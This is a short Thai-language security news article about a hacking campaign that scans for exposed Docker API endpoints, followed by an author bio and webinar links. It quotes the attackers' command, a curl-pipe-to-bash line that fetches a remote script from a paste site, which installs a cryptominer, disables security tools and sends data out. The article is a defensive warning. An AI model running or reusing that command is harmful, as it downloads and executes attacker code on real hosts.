พบแฮ็กเกอร์กำลังสแกนหา Docker ผ่านทางออนไลน์ไปแล้วถึง 59,000 ไอพี

Bad Packets ผู้เชี่ยวชาญด้านภัยคุกคามทางไซเบอร์ได้ออกมาเตือนถึงความพยามในการสแกนหา Docker เพื่อหา API Endpoint ที่ให้เข้าถึงจากออนไลน์ โดยมีการสแกนไปแล้วถึง 59,000 ไอพี

Credit: Andrey Popov/ShutterStock

เมื่อวันที่ 24 พฤศจิกายนที่ผ่านมาได้มีการค้นพบการสแกนเพื่อหาเหยื่อที่ใช้งาน Docker เพื่อค้นหา API Endpoint ที่สามารถใช้งานได้ผ่านทางออนไลน์ โดยแฮ็กเกอร์จะเข้าไปสั่งเริ่ม Alpine Linux Container ด้วยคำสั่งว่า “chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;” โดยท้ายที่สุดสคิร์ปต์ดังกล่าวจะไปเรียกติดตั้งตัวขุดเหมือง 

นอกจากนี้ผู้เชี่ยวชาญยังเผยว่าสคิร์ปต์ยังได้มีการสั่งปิดผลิตภัณฑ์ด้าน Security และสั่งปิดโปรเซส lso ซึ่งเป็นการกำจัดตัวขุดเหมือนอื่นๆ รวมถึงยังมีการลอบขโมยข้อมูลส่งกับไปหาเซิร์ฟเวอร์ด้วย ด้วยเหตุนี้เองเมื่อรู้เช่นนี้แล้วก็หมั่นตรวจสอบการใช้งานของเราเองด้วยนะครับว่ามีการเข้าถึงผ่านทางออนไลน์อย่างไร

ที่มา :  https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/



About nattakon

จบการศึกษา ปริญญาตรีและโท สาขาวิศวกรรมคอมพิวเตอร์ KMITL เคยทำงานด้าน Engineer/Presale ดูแลผลิตภัณฑ์ด้าน Network Security และ Public Cloud ในประเทศ ปัจจุบันเป็นนักเขียน Full-time ที่ TechTalkThai

Check Also

[Video Webinar] Cyber Threat Alliance – Making the Impossible Possible and WAN Edge Transformation

สำหรับผู้ที่ไม่ได้เข้าฟังการบรรยาย Webinar เรื่อง “Cyber Threat Alliance – Making the Impossible Possible and WAN Edge Transformation” …

[Video Webinar] Detecting Ransomware with Veeam by CSL

สำหรับผู้ที่ไม่ได้เข้าฟังการบรรยาย CSL Webinar เรื่อง “Detecting Ransomware with Veeam” เพื่อเรียนรู้การปกป้องข้อมูลจาก Ransomware และการปรับปรุงแผน Business Continuity ให้รองรับกับปริมาณข้อมูลที่เพิ่มมากขึ้น และสอดคล้องกับ …